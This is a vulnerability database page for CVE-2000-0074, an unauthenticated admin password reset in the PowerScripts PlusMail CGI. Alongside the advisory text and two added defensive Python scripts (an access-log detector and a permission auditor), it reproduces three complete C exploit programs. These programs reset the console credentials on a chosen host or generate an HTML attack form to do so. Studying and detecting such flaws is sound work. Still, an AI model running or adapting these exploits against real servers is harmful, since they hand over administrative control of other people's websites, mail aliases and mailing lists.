CVE-2000-0074
CVSS 7.5
Published: 2000-01-11 00:00:00
Revised: 2008-09-10 15:02:42

[Original] PowerScripts PlusMail CGI program allows remote attackers to execute commands via a password file with improper permissions.


[CNNVD] PowerScripts PlusMail WebConsole encryption issue vulnerability (CNNVD-200001-031)

        A vulnerability exists in the PowerScripts PlusMail CGI program. A remote attacker can execute commands by way of a password file with improper permissions.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0074
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0074
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-031
(official data source) CNNVD

- Other links and resources

- Vulnerability information

PowerScripts PlusMail WebConsole encryption issue vulnerability
High risk  Configuration error
2000-01-11 00:00:00 2005-10-20 00:00:00
Remote
        A vulnerability exists in the PowerScripts PlusMail CGI program. A remote attacker can execute commands by way of a password file with improper permissions.

- Advisories and patches

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (20799)

PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (1) (EDBID:20799)
cgi remote
2000-01-11 Verified
0 Synnergy Networks
N/A
source: http://www.securityfocus.com/bid/2653/info

PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to.

The specific affected versions have not been determined, and the developer cannot be located. 
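The reset described above leaves a recognisable trace in the web server's access log: a request to /cgi-bin/plusmail carrying the new_login, username, password or password1 fields. The GET form of the request puts those fields in the query string, where the log records them in full; a POST carries them in the body, which the access log does not keep, so every POST to the script deserves a look. The following Python script is an added example written for this page, not code from the original advisories or from PowerScripts. The log lines are constructed, and the combined-log-format regex, the severity labels and the field names used for matching are assumptions taken from the description above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
# Assumption: the server logs in this format; adjust the regex for other formats.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Form fields the plusmail script accepts for an account reset, as named in the advisory text.
RESET_PARAMS = {"new_login", "username", "password", "password1"}

# Constructed sample log (not real traffic): one GET-based reset, one POST, one unrelated hit, one plain GET.
SAMPLE_LOG = """\
198.51.100.7 - - [11/Jan/2000:03:14:07 +0000] "GET /cgi-bin/plusmail?login=pluz&password=pluz&password1=pluz&new_login=Login HTTP/1.0" 200 1532
198.51.100.7 - - [11/Jan/2000:03:14:09 +0000] "POST /cgi-bin/plusmail HTTP/1.0" 200 2210
192.0.2.10 - - [11/Jan/2000:03:15:00 +0000] "GET /index.html HTTP/1.0" 200 4013
192.0.2.10 - - [11/Jan/2000:03:15:02 +0000] "GET /cgi-bin/plusmail HTTP/1.0" 200 3100
"""


def classify(line):
    """Return (severity, reason) for one log line touching the plusmail script, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/cgi-bin/plusmail"):
        return None
    client, method, status = m.group("client"), m.group("method"), m.group("status")
    found = RESET_PARAMS.intersection(parse_qs(parts.query))
    if found:
        # Reset fields in the query string: the GET variant, visible in full in the log.
        return ("high", f"{method} with reset fields {sorted(found)} from {client} (status {status})")
    if method == "POST":
        # The body is not logged, so a POST may be the same reset; every POST is an admin action anyway.
        return ("medium", f"POST to plusmail from {client} (status {status})")
    return ("info", f"{method} to plusmail from {client} (status {status})")


def scan(lines):
    """Classify every line and return the hits, most severe first."""
    order = {"high": 0, "medium": 1, "info": 2}
    hits = [h for h in map(classify, lines) if h is not None]
    return sorted(hits, key=lambda h: order[h[0]])


if __name__ == "__main__":
    for severity, reason in scan(SAMPLE_LOG.splitlines()):
        print(f"[{severity:6}] {reason}")
```

Run it against a real access log with `scan(open(path).read().splitlines())`. Because the POST body is absent from the access log, the medium-severity hits can only be confirmed from a request-body log (a reverse proxy or web application firewall) or by checking whether the script's password file changed at that time; restricting who may reach the script at all, as the advisory's temporary fix of moving the directory does, reduces the set of POSTs worth chasing.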

/*
 * [Synnergy Networks http://www.synnergy.net]
 * 
 * Title:	plusbug.c - [remote plusmail exploit]
 * Author:	headflux (hf@synnergy.net)
 * Date:	01.10.2000
 * Description:	plusmail fails to check authenticity before creating new
 *		accounts
 *
 * [Synnergy Networks (c) 2000, http://www.synnergy.net]
 */

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    char *expcgi = "GET /cgi-bin/plusmail?login=pluz&password=pluz&"
                   "password1=pluz&new_login=Login HTTP/1.0\n\n";

    struct hostent *hp;
    struct in_addr addr;
    struct sockaddr_in s;
    char buf[280];
    int p;
    ssize_t n;

    if (argc < 2)               /* the original tested argc < 1, which can never be true */
    {
        printf("usage: %s hostname\n", argv[0]);
        exit(1);
    }

    hp = gethostbyname(argv[1]);
    if(!hp)
    {
        printf("bad hostname.\n");
        exit(1);
    }

    memcpy (&addr, hp->h_addr, sizeof (struct in_addr));
    memset (&s, 0, sizeof (s));
    s.sin_family = AF_INET;
    s.sin_port = htons(80);
    s.sin_addr = addr;
    p = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if(p < 0 || connect (p, (struct sockaddr *) &s, sizeof (s))!=0)
    {
        printf("error: unable to connect.\n");
        return 1;
    }

    send(p, expcgi, strlen(expcgi), 0);
    alarm(5);
    memset(buf, 0, sizeof (buf));
    n = read(p, buf, sizeof (buf) - 1);   /* leave room for the terminating NUL that strstr() needs */
    close(p);

    if (n > 0 && strstr(buf, "200 OK") && ! strstr(buf, "Invalid"))
        printf("account pluz/pluz created.\n");
    else
        printf("exploit failed.\n");

    return(0);
}
/*                    www.hack.co.za           [21 July]*/
		

- Vulnerability information (20800)

PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (2) (EDBID:20800)
cgi remote
2000-01-11 Verified
0 missnglnk
N/A
source: http://www.securityfocus.com/bid/2653/info
 
PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to.
 
The specific affected versions have not been determined, and the developer cannot be located. 

/*
 * plusmail cgi exploit 
   - missnglnk 
   greets: herf, ytcracker, mosthated, tino
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/param.h>

#include <errno.h>	/* perror() reads errno; the original declared it by hand with extern */

int
main(int argc, char **argv)
{
	int             argswitch, tport = 80, sockfd, plen, clntfd, lport = 4040, n;
	socklen_t       cltlen;			/* accept() wants socklen_t, not int */
	char           *target = NULL, tmpdata[32768], *password = "default",
	               *username = "jackdidntsetone", pdata[1024], *errcode,
	               *tmpline, *firstline, origdata[32768], htmldata[32768];
	size_t          hlen = 0;		/* bytes of htmldata filled so far */
	struct sockaddr_in rmt, srv, clt;
	struct hostent *he;
	in_addr_t       ip;

	if (argc < 5) {
		printf("plusmail cgi exploit by missnglnk\n");
		printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n",
argv[0]);
		return -1;
	}

	while ((argswitch = getopt(argc, argv, "h:p:u:n:l:v")) != -1) {
		switch (argswitch) {
		case 'h':
			if (strlen(optarg) > MAXHOSTNAMELEN) {
				printf("ERROR: Target hostname too long.\n");
				return -1;
			}
			target = optarg;
			break;

		case 'p':
			tport = atoi(optarg);
			break;

		case 'n':
			if (strlen(optarg) > 8) {
				printf("Password length greater than 8 characters.\n");
				return -1;
			}
			password = optarg;
			break;

		case 'u':
			if (strlen(optarg) > 8) {
				printf("Username length greater than 8 characters.\n");
				return -1;
			}
			username = optarg;
			break;

		case 'l':
			lport = atoi(optarg);
			break;

		case '?':
		default:
			printf("plusmail cgi exploit by missnglnk\n");
			printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]);
			return -1;
			break;
		}
	}

	argc -= optind;
	argv += optind;

	if (target == NULL) {		/* -h is mandatory; the original went on to dereference a NULL target */
		printf("ERROR: no target given (-h).\n");
		return -1;
	}

	bzero(&rmt, sizeof(rmt));
	bzero(&srv, sizeof(srv));
	bzero(&clt, sizeof(clt));
	bzero(tmpdata, sizeof(tmpdata));
	bzero(htmldata, sizeof(htmldata));
	cltlen = sizeof(clt);

	if ((he = gethostbyname(target)) != NULL) {
		memcpy(&ip, he->h_addr, sizeof(ip));	/* copy exactly one IPv4 address, not an unsigned long */
	} else if ((ip = inet_addr(target)) == INADDR_NONE) {
		fprintf(stderr, "Error resolving target\n");
		return -1;
	}

	rmt.sin_family = AF_INET;
	rmt.sin_addr.s_addr = ip;
	rmt.sin_port = htons(tport);

	srv.sin_family = AF_INET;
	srv.sin_addr.s_addr = INADDR_ANY;
	srv.sin_port = htons(lport);

	if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("Error creating socket");
		return -1;
	}

	if (connect(sockfd, (struct sockaddr *) & rmt, sizeof(rmt)) < 0) {
		perror("Error connecting");
		return -1;
	}

	snprintf(pdata, sizeof(pdata), "username=%s&password=%s&password1=%s&new_login=missnglnk", username, password,
password);
	plen = strlen(pdata);

	snprintf(tmpdata, sizeof(tmpdata), "POST /cgi-bin/plusmail HTTP/1.0\n" \
		 "Referer: http://www.pure-security.net\n" \
		 "User-Agent: Mozilla/4.08 [en] (X11; I; SunOS 5.7 missnglnk)\n" \
		 "Host: %s\n" \
		 "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n" \
		 "Accept-Encoding: gzip\n" \
		 "Accept-Language: en\n" \
		 "Accept-Charset: isp-8859-1,*,utf-8\n" \
		 "Content-type: application/x-www-form-urlencoded\n" \
		 "Content-length: %d\n" \
		 "\n%s\n", target, plen, pdata);

	if (write(sockfd, tmpdata, strlen(tmpdata)) < strlen(tmpdata)) {
		perror("Error writing data");
		return -1;
	}

	bzero(tmpdata, sizeof(tmpdata));
	while (read(sockfd, tmpdata, sizeof(tmpdata) - 1) > 0) {
		strncpy(origdata, tmpdata, sizeof(origdata));
		firstline = strtok(tmpdata, "\n");

		if (firstline != NULL && (errcode = strstr(firstline, "404")) != NULL) {
			printf("plusmail.cgi aint here buddy.\n");
			return -1;
		}

		/* Copy the page line by line into htmldata, rewriting the form action to point at
		 * the target. The original appended with snprintf(htmldata, ..., "%s...", htmldata, ...),
		 * i.e. it passed the destination as one of its own sources, which is undefined
		 * behaviour; writing at htmldata + hlen avoids that and keeps the bound honest. */
		for ((tmpline = strtok(origdata, "\n")); tmpline != NULL; (tmpline = strtok(NULL, "\n"))) {
			if ((errcode = strstr(tmpline, "<form action")) != NULL)
				n = snprintf(htmldata + hlen, sizeof(htmldata) - hlen,
					     "<form action = \"http://%s/cgi-bin/plusmail\" method = \"post\">\n", target);
			else
				n = snprintf(htmldata + hlen, sizeof(htmldata) - hlen, "%s\n", tmpline);

			if (n < 0 || (size_t) n >= sizeof(htmldata) - hlen) {
				printf("response too large, output truncated.\n");
				hlen = sizeof(htmldata) - 1;
				break;
			}
			hlen += n;
		}
		bzero(tmpdata, sizeof(tmpdata));
	}

	if (close(sockfd) < 0) {
		perror("Error closing socket");
		return -1;
	}

	strncat(htmldata, "\n<br><missnglnk>", sizeof(htmldata) - strlen(htmldata) - 1);	/* size argument is the free space, not the buffer size */

	if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("Error creating socket");
		return -1;
	}

	printf("waiting on port %d...", lport);

	if (bind(sockfd, (struct sockaddr *) & srv, sizeof(srv)) < 0) {
		perror("Error binding to socket");
		return -1;
	}

	if (listen(sockfd, 0) < 0) {
		perror("Error setting backlog");
		return -1;
	}

	if ((clntfd = accept(sockfd, (struct sockaddr *) & clt, &cltlen)) < 0) {
		perror("Error accepting connection");
		return -1;
	}

	printf("connection from %s:%d\n", inet_ntoa(clt.sin_addr), ntohs(clt.sin_port));

	if (write(clntfd, htmldata, strlen(htmldata)) < 0) {	/* send only the bytes actually filled in */
		perror("Error writing data");
		return -1;
	}

	if (close(clntfd) < 0) {
		perror("Error closing socket");
		return -1;
	}

	printf("\n%s\n", htmldata);
	return 0;
}






		

- Vulnerability information (20801)

PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (3) (EDBID:20801)
cgi remote
2000-01-20 Verified
0 ytcracker
N/A
source: http://www.securityfocus.com/bid/2653/info
  
PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to.
  
The specific affected versions have not been determined, and the developer cannot be located. 

/*

[gH Security Advisory]

software affected:	PowerScripts PlusMail
versions affected:	All versions to current.
discussion:		Read report below.

*/

/*

[gH-plus.c]

title:		[gH plusmail vulnerability]
date:		01.20.2000
author:		ytcracker of gH [phed@felons.org]
comments:	plusmail is an extremely popular cgi-based administration
		tool that allows you to take control of your website
		with a graphical control panel interface.  the password
		file, however, is set with permissions rw enabled,
		therefore granting the authority to change the password
		whenever's clever.
		the following code will detect the vulnerability and
		generate the required html to exploit.
shouts:		seven one nine.  all of gH.  www.mp3.com/category5.
		herf@ghettophreaks.org for finding vulnerability.

[Advisory Information]

written by:	mosthated of gH [most@pure-security.net]
vulnerable:	So far, any environment running Plusmail.
report:		Noticed plusmail running on multiple operating systems.
		The vulnerability lies in the web based tool, which
		now that is easily exploited, gives you "ADVANCED CONTROL"
		of a target website.  Below is the code by ytcracker of gH,
		which demonstrates how easy it is to generate the html code
		which is executed by your web browser to compromise the
		target host.  We have noticed this PlusMail program is widely
		used, but have yet to succeed in finding the main site for
		PlusMail to acknowledge the developers of the remote 
		vulnerability.

		Most likely this will be ripped out during the online trading,
		because of script kids not liking this factual addition, but 
		nevertheless, it will be expressed.  This exploit was written 
		to acknowledge security weaknesses, but in no way promotes web 
		page defacements.  If you further use this program to gain access 
		to anything not normally accessible by yourself, meaning you 
		script kids, then you are subject to be prosecuted and even get 
		10 years in prison.  Is it honestly worth it to compile this program 
		and randomly ./hack sites and deface them with this half way 
		automated program to put your nick & group on it?  
		The answer is NO.  gh/global hell.. Heard of us?? Seen us on TV??
		Read about us?? Most likely..	We've changed and gained knowledge 
		from the experience....Been there done that..  The world didn't
		believe that a group like this could completely go legit, the IT
		professionals figured we would retaliate against the fbi and the
		world was scared by misleading media articles about how we are
		terrorists and destructive teens.  I ask the world now, who is helping
		whom?  Did the media find this vulnerability?  Did the stereotypists
		who label us as "cyber gang members" find this vulnerability and allow
		networks around the world to be patched before so called "destructive
		hackers" gained access to them?  Answer yet again, NO, we did, not you
		who falsely claim to be helping with security.  Your defacements don't
		help anything, we thought it did before as well, now we realize that
		it does nothing positive.  You stereotypists know nothing about gH, yet
		can write articles, you're wrong.  You people think so much that you know
		so much about hackers.  You know nothing, what you think you know, is
		wrong.  What you don't know about us, the information is right under
		your nose, yet you still can't put your finger on it.  There are 2 sides
		to the so called "hacking scene", you people should realize there will
		always be a good and a bad side to most matters.  Don't exploit the
		fact that you don't know anything about the whole situation, just face 
		the real fact, our knowledge could be a great help to all, why not
		accept us as normal people, not untrue off the wall assumptions.
		If you use programs like this to deface sites, think before you use
		this one, because we have been through the childish fights online
		and expressed our feelings, we are still where we started, from square
		one and would not have gone any farther, until we realized that what we
		were doing was stupid, pathetic, futureless and illegal.  Choose
		your path wisely, either stop the script kiddie bullshit or get 
		your door kicked in, you decide.
fix:		Move/rename the PlusMail directory as a temporary fix.

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <fcntl.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>		/* inet_addr() */
#include <signal.h>
#include <arpa/nameser.h>
#include <sys/stat.h>

int main(int argc, char *argv[])
{
	int sock;
        unsigned long vulnip;

	struct in_addr addr;
	struct sockaddr_in sin;
	struct hostent *he;
                                                                     	
        char *detect;
	char buffer[1024];
	char plusvuln[]="GET /cgi-bin/plusmail HTTP/1.0\n\n";
	char htmI[]="<html><head><title>[gH plusmail exploit]</title></head><form action=\"http://";
	char htmII[]="/cgi-bin/plusmail\" method=\"post\"><p>username: <input type=\"text\" name=\"username\"><br>password: "
	             "<input type=\"password\" name=\"password\"><br>retype password: <input type=\"password\" name=\"password1\"></p><p><input "
	             "type=\"submit\" name=\"new_login\" value=\"reset password\"></p></form><p><a href=\"http://pure-security.net\">Pure Security "
	             "Networks</a></p></body></html>";

        FILE *html;

	printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");

	if(argc<2)
	{
		printf(" usage: %s [vulnerable website]\n\n",argv[0]);
                exit(0);
	}

	if ((he=gethostbyname(argv[1])) == NULL)
	{
		herror("gethostbyname");
		exit(0);
	}

	vulnip=inet_addr(argv[1]);
        vulnip=ntohl(vulnip);

	sock=socket(AF_INET, SOCK_STREAM, 0);
	bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
	sin.sin_family=AF_INET;
	sin.sin_port=htons(80);

	if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
	{  
		perror("connect");
		exit(1);			/* the original carried on and used the dead socket */
	}

	send(sock, plusvuln,strlen(plusvuln),0);
	memset(buffer, 0, sizeof(buffer));
	recv(sock, buffer, sizeof(buffer)-1, 0);	/* keep a terminating NUL for strstr() */
	detect = strstr(buffer,"404");
	close(sock);
     
	if( detect != NULL)
        {
		printf(" vulnerability not detected.\n");
                exit(0);
        }
	else
		printf(" vulnerability detected.  generating html...\n");
	
	html=fopen("plus.html","w+b");
	if(html==NULL)
	{
		perror("fopen");
		exit(1);
	}
	fprintf(html,"%s",htmI);
	fprintf(html,"%s",argv[1]);
	fprintf(html,"%s",htmII);
        fclose(html);

	printf(" spawning lynx...\n");

        system("lynx plus.html");
	return 0;
}
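The gH advisory above attributes the problem to a password file that is left readable and writable by everyone, and offers moving or renaming the PlusMail directory as a stopgap. A defender can look for, and correct, that class of misconfiguration directly. The following Python script is an added example written for this page, not code from the advisory or from PowerScripts: it audits a directory tree for group- or world-writable entries and world-readable credential files, then tightens them. The directory layout, the file names and the name heuristic for credential files are constructed assumptions; the page does not give the real PlusMail password file path.

```python
import os
import stat
import shutil
import tempfile

# Assumption: credential files are recognised by name; the real PlusMail password file name is not on the page.
SECRET_NAME_TOKENS = ("passw", "pwd", ".htpasswd")


def is_secret_name(name):
    """Heuristic: does this file name look like it holds credentials?"""
    lowered = name.lower()
    return any(tok in lowered for tok in SECRET_NAME_TOKENS)


def mode_of(path):
    """Permission bits of path as an int (e.g. 0o600), for reporting."""
    return stat.S_IMODE(os.lstat(path).st_mode)


def audit_tree(root):
    """Walk root and return sorted (relative_path, finding) pairs for unsafe permission bits."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            rel = os.path.relpath(full, root)
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            elif mode & stat.S_IWGRP:
                findings.append((rel, "group-writable"))
            if stat.S_ISREG(mode) and (mode & stat.S_IROTH) and is_secret_name(name):
                findings.append((rel, "world-readable credential file"))
    return sorted(findings)


def remediate(root):
    """Fix each flagged path: credential files become owner-only (0600), everything else loses group/world write."""
    changed = 0
    for rel in sorted({rel for rel, _ in audit_tree(root)}):
        full = os.path.join(root, rel)
        st = os.lstat(full)
        mode = stat.S_IMODE(st.st_mode)
        if stat.S_ISREG(st.st_mode) and is_secret_name(os.path.basename(full)):
            new_mode = 0o600
        else:
            new_mode = mode & ~(stat.S_IWGRP | stat.S_IWOTH)
        if new_mode != mode:
            os.chmod(full, new_mode)
            changed += 1
    return changed


def build_demo_tree():
    """Create a throwaway directory imitating a CGI install (constructed layout, not PlusMail's real one)."""
    root = tempfile.mkdtemp(prefix="plusmail-audit-")
    layout = {
        "plusmail": 0o755,                  # the CGI script itself
        "data/passwd.txt": 0o666,           # the weak setting: anyone can read or rewrite the credentials
        "data/lists.txt": 0o644,            # ordinary data, readable but not writable by others
        "data/hardened_passwd.txt": 0o600,  # the corrected setting
    }
    for rel, mode in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(full, mode)
    for dirpath, dirnames, _ in os.walk(root):  # pin directory modes so the umask does not affect the result
        for d in dirnames:
            os.chmod(os.path.join(dirpath, d), 0o755)
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    try:
        for rel, finding in audit_tree(root):
            print(f"{finding:32} {rel}")
        print(f"fixed {remediate(root)} path(s); remaining findings: {audit_tree(root)}")
    finally:
        shutil.rmtree(root)
```

Point `audit_tree` at the real cgi-bin to get a report before changing anything, and only then run `remediate`. Owner-only credential files assume the CGI process runs as the file owner; if the web server runs under a different account, the file needs to be owned by that account (or group-readable by it) rather than made world-readable again.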


		

- Vulnerability information

139
PlusMail plusmail CGI Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- Vulnerability description

- Timeline

2000-01-11 Unknown
2000-01-11 Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

PowerScripts PlusMail WebConsole Poor Authentication Vulnerability
Configuration Error 2653
Yes No
2000-01-11 12:00:00 2009-07-11 06:06:00
Posted to BugTraq on January 11th, 2000 by YT Cracker < phed@felons.org >

- Affected software versions

PowerScripts PlusMail WebConsole 1.0
- Apache Software Foundation Apache 1.3.9

- Discussion

PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to.

The specific affected versions have not been determined, and the developer cannot be located.

- Exploit

x

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References

     

     
